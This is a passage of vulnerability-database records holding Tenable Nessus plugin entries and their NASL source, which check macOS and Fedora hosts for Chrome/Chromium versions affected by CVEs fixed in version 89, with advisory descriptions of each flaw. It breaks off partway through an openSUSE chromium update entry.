by\nmultiple vulnerabilities as referenced in the 2021_03_stable-channel-update-for-desktop advisory. Note that Nessus has\nnot tested for this issue but has instead relied only on the application's self-reported version number.", "edition": 4, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-03-02T00:00:00", "title": "Google Chrome < 89.0.4389.72 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-21168", "CVE-2021-21173", "CVE-2021-21185", "CVE-2021-21165", "CVE-2021-21179", "CVE-2021-21171", "CVE-2020-27844", "CVE-2021-21161", "CVE-2021-21178", "CVE-2021-21176", "CVE-2021-21159", "CVE-2021-21187", "CVE-2021-21180", "CVE-2021-21170", "CVE-2021-21162", "CVE-2021-21181", "CVE-2021-21167", "CVE-2021-21172", "CVE-2021-21163", "CVE-2021-21186", "CVE-2021-21166", "CVE-2021-21175", "CVE-2021-21190", "CVE-2021-21160", "CVE-2021-21184", "CVE-2021-21164", "CVE-2021-21188", "CVE-2021-21174", "CVE-2021-21177", "CVE-2021-21189", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21169"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_89_0_4389_72.NASL", "href": "https://www.tenable.com/plugins/nessus/146949", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146949);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/15\");\n\n script_cve_id(\n \"CVE-2020-27844\",\n \"CVE-2021-21159\",\n \"CVE-2021-21160\",\n \"CVE-2021-21161\",\n \"CVE-2021-21162\",\n \"CVE-2021-21163\",\n \"CVE-2021-21164\",\n \"CVE-2021-21165\",\n \"CVE-2021-21166\",\n \"CVE-2021-21167\",\n \"CVE-2021-21168\",\n \"CVE-2021-21169\",\n \"CVE-2021-21170\",\n \"CVE-2021-21171\",\n \"CVE-2021-21172\",\n \"CVE-2021-21173\",\n \"CVE-2021-21174\",\n \"CVE-2021-21175\",\n \"CVE-2021-21176\",\n \"CVE-2021-21177\",\n \"CVE-2021-21178\",\n \"CVE-2021-21179\",\n \"CVE-2021-21180\",\n \"CVE-2021-21181\",\n \"CVE-2021-21182\",\n \"CVE-2021-21183\",\n \"CVE-2021-21184\",\n \"CVE-2021-21185\",\n \"CVE-2021-21186\",\n \"CVE-2021-21187\",\n \"CVE-2021-21188\",\n \"CVE-2021-21189\",\n \"CVE-2021-21190\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0117\");\n\n script_name(english:\"Google Chrome < 89.0.4389.72 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote macOS host is prior to 89.0.4389.72. It is, therefore, affected by\nmultiple vulnerabilities as referenced in the 2021_03_stable-channel-update-for-desktop advisory. Note that Nessus has\nnot tested for this issue but has instead relied only on the application's self-reported version number.\");\n # https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fc64b00e\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1171049\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1170531\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1173702\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1172054\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1111239\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1164846\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1174582\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1177465\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1161144\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1152226\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1166138\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1111646\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1152894\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1150810\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1154250\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1158010\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1146651\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1170584\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1173879\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1174186\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1174943\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1175507\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1177875\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1182767\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1049265\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1105875\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1131929\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1100748\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1153445\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1155516\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1161739\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1165392\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1166091\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 89.0.4389.72 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27844\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('MacOSX/Google Chrome/Installed');\n\ngoogle_chrome_check_version(fix:'89.0.4389.72', severity:SECURITY_HOLE, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2021-04-13T07:58:03", "description": "The remote Fedora 32 host has a package installed that is affected by multiple vulnerabilities as referenced in the\nFEDORA-2021-c88a96bd4b advisory.\n\n - Stack buffer overflow in Data Transfer in Google Chrome on Linux prior to 88.0.4324.182 allowed a remote\n attacker to perform out of bounds memory access via a crafted HTML page. (CVE-2021-21149)\n\n - Use after free in Downloads in Google Chrome on Windows prior to 88.0.4324.182 allowed a remote attacker\n who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.\n (CVE-2021-21150)\n\n - Use after free in Payments in Google Chrome prior to 88.0.4324.182 allowed a remote attacker to\n potentially perform a sandbox escape via a crafted HTML page. (CVE-2021-21151)\n\n - Heap buffer overflow in Media in Google Chrome on Linux prior to 88.0.4324.182 allowed a remote attacker\n to potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21152)\n\n - Stack buffer overflow in GPU Process in Google Chrome on Linux prior to 88.0.4324.182 allowed a remote\n attacker to potentially perform out of bounds memory access via a crafted HTML page. (CVE-2021-21153)\n\n - Heap buffer overflow in Tab Strip in Google Chrome prior to 88.0.4324.182 allowed a remote attacker who\n had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.\n (CVE-2021-21154)\n\n - Heap buffer overflow in Tab Strip in Google Chrome on Windows prior to 88.0.4324.182 allowed a remote\n attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted\n HTML page. (CVE-2021-21155)\n\n - Heap buffer overflow in V8 in Google Chrome prior to 88.0.4324.182 allowed a remote attacker to\n potentially exploit heap corruption via a crafted script. (CVE-2021-21156)\n\n - Use after free in Web Sockets in Google Chrome on Linux prior to 88.0.4324.182 allowed a remote attacker\n to potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21157)\n\n - Heap buffer overflow in TabStrip in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21159, CVE-2021-21161)\n\n - Heap buffer overflow in WebAudio in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21160)\n\n - Use after free in WebRTC in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (CVE-2021-21162)\n\n - Insufficient data validation in Reader Mode in Google Chrome on iOS prior to 89.0.4389.72 allowed a remote\n attacker to leak cross-origin data via a crafted HTML page and a malicious server. (CVE-2021-21163)\n\n - Insufficient data validation in Chrome on iOS in Google Chrome on iOS prior to 89.0.4389.72 allowed a\n remote attacker to leak cross-origin data via a crafted HTML page. (CVE-2021-21164)\n\n - Data race in audio in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit\n heap corruption via a crafted HTML page. (CVE-2021-21165, CVE-2021-21166)\n\n - Use after free in bookmarks in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21167)\n\n - Insufficient policy enforcement in appcache in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to obtain potentially sensitive information from process memory via a crafted HTML page.\n (CVE-2021-21168)\n\n - Out of bounds memory access in V8 in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to\n potentially perform out of bounds memory access via a crafted HTML page. (CVE-2021-21169)\n\n - Incorrect security UI in Loader in Google Chrome prior to 89.0.4389.72 allowed a remote attacker who had\n compromised the renderer process to spoof the contents of the Omnibox (URL bar) via a crafted HTML page.\n (CVE-2021-21170)\n\n - Incorrect security UI in TabStrip and Navigation in Google Chrome on Android prior to 89.0.4389.72 allowed\n a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. (CVE-2021-21171)\n\n - Insufficient policy enforcement in File System API in Google Chrome on Windows prior to 89.0.4389.72\n allowed a remote attacker to bypass filesystem restrictions via a crafted HTML page. (CVE-2021-21172)\n\n - Side-channel information leakage in Network Internals in Google Chrome prior to 89.0.4389.72 allowed a\n remote attacker to leak cross-origin data via a crafted HTML page. (CVE-2021-21173)\n\n - Inappropriate implementation in Referrer in Google Chrome prior to 89.0.4389.72 allowed a remote attacker\n to bypass navigation restrictions via a crafted HTML page. (CVE-2021-21174)\n\n - Inappropriate implementation in Site isolation in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to leak cross-origin data via a crafted HTML page. (CVE-2021-21175)\n\n - Inappropriate implementation in full screen mode in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. (CVE-2021-21176)\n\n - Insufficient policy enforcement in Autofill in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to obtain potentially sensitive information from process memory via a crafted HTML page.\n (CVE-2021-21177)\n\n - Inappropriate implementation in Compositing in Google Chrome on Linux and Windows prior to 89.0.4389.72\n allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page.\n (CVE-2021-21178)\n\n - Use after free in Network Internals in Google Chrome on Linux prior to 89.0.4389.72 allowed a remote\n attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21179)\n\n - Use after free in tab search in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21180)\n\n - Side-channel information leakage in autofill in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to obtain potentially sensitive information from process memory via a crafted HTML page.\n (CVE-2021-21181)\n\n - Insufficient policy enforcement in navigations in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker who had compromised the renderer process to bypass navigation restrictions via a crafted HTML\n page. (CVE-2021-21182)\n\n - Inappropriate implementation in performance APIs in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to leak cross-origin data via a crafted HTML page. (CVE-2021-21183, CVE-2021-21184)\n\n - Insufficient policy enforcement in extensions in Google Chrome prior to 89.0.4389.72 allowed an attacker\n who convinced a user to install a malicious extension to obtain sensitive information via a crafted Chrome\n Extension. (CVE-2021-21185)\n\n - Insufficient policy enforcement in QR scanning in Google Chrome on iOS prior to 89.0.4389.72 allowed an\n attacker who convinced the user to scan a QR code to bypass navigation restrictions via a crafted QR code.\n (CVE-2021-21186)\n\n - Insufficient data validation in URL formatting in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to perform domain spoofing via IDN homographs via a crafted domain name. (CVE-2021-21187)\n\n - Use after free in Blink in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (CVE-2021-21188)\n\n - Insufficient policy enforcement in payments in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to bypass navigation restrictions via a crafted HTML page. (CVE-2021-21189)\n\n - Uninitialized data in PDFium in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to obtain\n potentially sensitive information from process memory via a crafted PDF file. (CVE-2021-21190)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 3, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-03-22T00:00:00", "title": "Fedora 32 : chromium (2021-c88a96bd4b)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-21168", "CVE-2021-21173", "CVE-2021-21151", "CVE-2021-21185", "CVE-2021-21165", "CVE-2021-21179", "CVE-2021-21171", "CVE-2021-21161", "CVE-2021-21178", "CVE-2021-21176", "CVE-2021-21159", "CVE-2021-21187", "CVE-2021-21180", "CVE-2021-21170", "CVE-2021-21156", "CVE-2021-21162", "CVE-2021-21181", "CVE-2021-21155", "CVE-2021-21167", "CVE-2021-21150", "CVE-2021-21172", "CVE-2021-21152", "CVE-2021-21163", "CVE-2021-21186", "CVE-2021-21166", "CVE-2021-21154", "CVE-2021-21175", "CVE-2021-21190", "CVE-2021-21149", "CVE-2021-21160", "CVE-2021-21184", "CVE-2021-21164", "CVE-2021-21188", "CVE-2021-21174", "CVE-2021-21177", "CVE-2021-21189", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21169", "CVE-2021-21153", "CVE-2021-21157"], "modified": "2021-03-22T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:32", "p-cpe:/a:fedoraproject:fedora:chromium"], "id": "FEDORA_2021-C88A96BD4B.NASL", "href": "https://www.tenable.com/plugins/nessus/147941", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n# The descriptive text and package checks in this plugin were\n# extracted from Fedora Security Advisory FEDORA-2021-c88a96bd4b\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147941);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/04/12\");\n\n script_cve_id(\n \"CVE-2021-21149\",\n \"CVE-2021-21150\",\n \"CVE-2021-21151\",\n \"CVE-2021-21152\",\n \"CVE-2021-21153\",\n \"CVE-2021-21154\",\n \"CVE-2021-21155\",\n \"CVE-2021-21156\",\n \"CVE-2021-21157\",\n \"CVE-2021-21159\",\n \"CVE-2021-21160\",\n \"CVE-2021-21161\",\n \"CVE-2021-21162\",\n \"CVE-2021-21163\",\n \"CVE-2021-21164\",\n \"CVE-2021-21165\",\n \"CVE-2021-21166\",\n \"CVE-2021-21167\",\n \"CVE-2021-21168\",\n \"CVE-2021-21169\",\n \"CVE-2021-21170\",\n \"CVE-2021-21171\",\n \"CVE-2021-21172\",\n \"CVE-2021-21173\",\n \"CVE-2021-21174\",\n \"CVE-2021-21175\",\n \"CVE-2021-21176\",\n \"CVE-2021-21177\",\n \"CVE-2021-21178\",\n \"CVE-2021-21179\",\n \"CVE-2021-21180\",\n \"CVE-2021-21181\",\n \"CVE-2021-21182\",\n \"CVE-2021-21183\",\n \"CVE-2021-21184\",\n \"CVE-2021-21185\",\n \"CVE-2021-21186\",\n \"CVE-2021-21187\",\n \"CVE-2021-21188\",\n \"CVE-2021-21189\",\n \"CVE-2021-21190\"\n );\n script_xref(name:\"FEDORA\", value:\"2021-c88a96bd4b\");\n\n script_name(english:\"Fedora 32 : chromium (2021-c88a96bd4b)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Fedora 32 host has a package installed that is affected by multiple vulnerabilities as referenced in the\nFEDORA-2021-c88a96bd4b advisory.\n\n - Stack buffer overflow in Data Transfer in Google Chrome on Linux prior to 88.0.4324.182 allowed a remote\n attacker to perform out of bounds memory access via a crafted HTML page. (CVE-2021-21149)\n\n - Use after free in Downloads in Google Chrome on Windows prior to 88.0.4324.182 allowed a remote attacker\n who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.\n (CVE-2021-21150)\n\n - Use after free in Payments in Google Chrome prior to 88.0.4324.182 allowed a remote attacker to\n potentially perform a sandbox escape via a crafted HTML page. (CVE-2021-21151)\n\n - Heap buffer overflow in Media in Google Chrome on Linux prior to 88.0.4324.182 allowed a remote attacker\n to potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21152)\n\n - Stack buffer overflow in GPU Process in Google Chrome on Linux prior to 88.0.4324.182 allowed a remote\n attacker to potentially perform out of bounds memory access via a crafted HTML page. (CVE-2021-21153)\n\n - Heap buffer overflow in Tab Strip in Google Chrome prior to 88.0.4324.182 allowed a remote attacker who\n had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.\n (CVE-2021-21154)\n\n - Heap buffer overflow in Tab Strip in Google Chrome on Windows prior to 88.0.4324.182 allowed a remote\n attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted\n HTML page. (CVE-2021-21155)\n\n - Heap buffer overflow in V8 in Google Chrome prior to 88.0.4324.182 allowed a remote attacker to\n potentially exploit heap corruption via a crafted script. (CVE-2021-21156)\n\n - Use after free in Web Sockets in Google Chrome on Linux prior to 88.0.4324.182 allowed a remote attacker\n to potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21157)\n\n - Heap buffer overflow in TabStrip in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21159, CVE-2021-21161)\n\n - Heap buffer overflow in WebAudio in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21160)\n\n - Use after free in WebRTC in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (CVE-2021-21162)\n\n - Insufficient data validation in Reader Mode in Google Chrome on iOS prior to 89.0.4389.72 allowed a remote\n attacker to leak cross-origin data via a crafted HTML page and a malicious server. (CVE-2021-21163)\n\n - Insufficient data validation in Chrome on iOS in Google Chrome on iOS prior to 89.0.4389.72 allowed a\n remote attacker to leak cross-origin data via a crafted HTML page. (CVE-2021-21164)\n\n - Data race in audio in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit\n heap corruption via a crafted HTML page. (CVE-2021-21165, CVE-2021-21166)\n\n - Use after free in bookmarks in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21167)\n\n - Insufficient policy enforcement in appcache in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to obtain potentially sensitive information from process memory via a crafted HTML page.\n (CVE-2021-21168)\n\n - Out of bounds memory access in V8 in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to\n potentially perform out of bounds memory access via a crafted HTML page. (CVE-2021-21169)\n\n - Incorrect security UI in Loader in Google Chrome prior to 89.0.4389.72 allowed a remote attacker who had\n compromised the renderer process to spoof the contents of the Omnibox (URL bar) via a crafted HTML page.\n (CVE-2021-21170)\n\n - Incorrect security UI in TabStrip and Navigation in Google Chrome on Android prior to 89.0.4389.72 allowed\n a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. (CVE-2021-21171)\n\n - Insufficient policy enforcement in File System API in Google Chrome on Windows prior to 89.0.4389.72\n allowed a remote attacker to bypass filesystem restrictions via a crafted HTML page. (CVE-2021-21172)\n\n - Side-channel information leakage in Network Internals in Google Chrome prior to 89.0.4389.72 allowed a\n remote attacker to leak cross-origin data via a crafted HTML page. (CVE-2021-21173)\n\n - Inappropriate implementation in Referrer in Google Chrome prior to 89.0.4389.72 allowed a remote attacker\n to bypass navigation restrictions via a crafted HTML page. (CVE-2021-21174)\n\n - Inappropriate implementation in Site isolation in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to leak cross-origin data via a crafted HTML page. (CVE-2021-21175)\n\n - Inappropriate implementation in full screen mode in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. (CVE-2021-21176)\n\n - Insufficient policy enforcement in Autofill in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to obtain potentially sensitive information from process memory via a crafted HTML page.\n (CVE-2021-21177)\n\n - Inappropriate implementation in Compositing in Google Chrome on Linux and Windows prior to 89.0.4389.72\n allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page.\n (CVE-2021-21178)\n\n - Use after free in Network Internals in Google Chrome on Linux prior to 89.0.4389.72 allowed a remote\n attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21179)\n\n - Use after free in tab search in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21180)\n\n - Side-channel information leakage in autofill in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to obtain potentially sensitive information from process memory via a crafted HTML page.\n (CVE-2021-21181)\n\n - Insufficient policy enforcement in navigations in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker who had compromised the renderer process to bypass navigation restrictions via a crafted HTML\n page. (CVE-2021-21182)\n\n - Inappropriate implementation in performance APIs in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to leak cross-origin data via a crafted HTML page. (CVE-2021-21183, CVE-2021-21184)\n\n - Insufficient policy enforcement in extensions in Google Chrome prior to 89.0.4389.72 allowed an attacker\n who convinced a user to install a malicious extension to obtain sensitive information via a crafted Chrome\n Extension. (CVE-2021-21185)\n\n - Insufficient policy enforcement in QR scanning in Google Chrome on iOS prior to 89.0.4389.72 allowed an\n attacker who convinced the user to scan a QR code to bypass navigation restrictions via a crafted QR code.\n (CVE-2021-21186)\n\n - Insufficient data validation in URL formatting in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to perform domain spoofing via IDN homographs via a crafted domain name. (CVE-2021-21187)\n\n - Use after free in Blink in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (CVE-2021-21188)\n\n - Insufficient policy enforcement in payments in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to bypass navigation restrictions via a crafted HTML page. (CVE-2021-21189)\n\n - Uninitialized data in PDFium in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to obtain\n potentially sensitive information from process memory via a crafted PDF file. (CVE-2021-21190)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2021-c88a96bd4b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected chromium package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21190\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:32\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chromium\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Fedora' >!< release) audit(AUDIT_OS_NOT, 'Fedora');\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Fedora');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^32([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Fedora 32', 'Fedora ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Fedora', cpu);\n\npkgs = [\n {'reference':'chromium-89.0.4389.82-1.fc32', 'release':'FC32', 'rpm_spec_vers_cmp':TRUE, 'allowmaj':TRUE}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'chromium');\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-17T04:57:56", "description": "This update for chromium fixes the following issues :\n\nUpdate to 89.0.4389.72 (boo#1182358, boo#1182960) :\n\n - CVE-2021-21159: Heap buffer overflow in TabStrip.\n\n - CVE-2021-21160: Heap buffer overflow in WebAudio.\n\n - CVE-2021-21161: Heap buffer overflow in TabStrip.\n\n - CVE-2021-21162: Use after free in WebRTC.\n\n - CVE-2021-21163: Insufficient data validation in Reader\n Mode.\n\n - CVE-2021-21164: Insufficient data validation in Chrome\n for iOS.\n\n - CVE-2021-21165: Object lifecycle issue in audio.\n\n - CVE-2021-21166: Object lifecycle issue in audio.\n\n - CVE-2021-21167: Use after 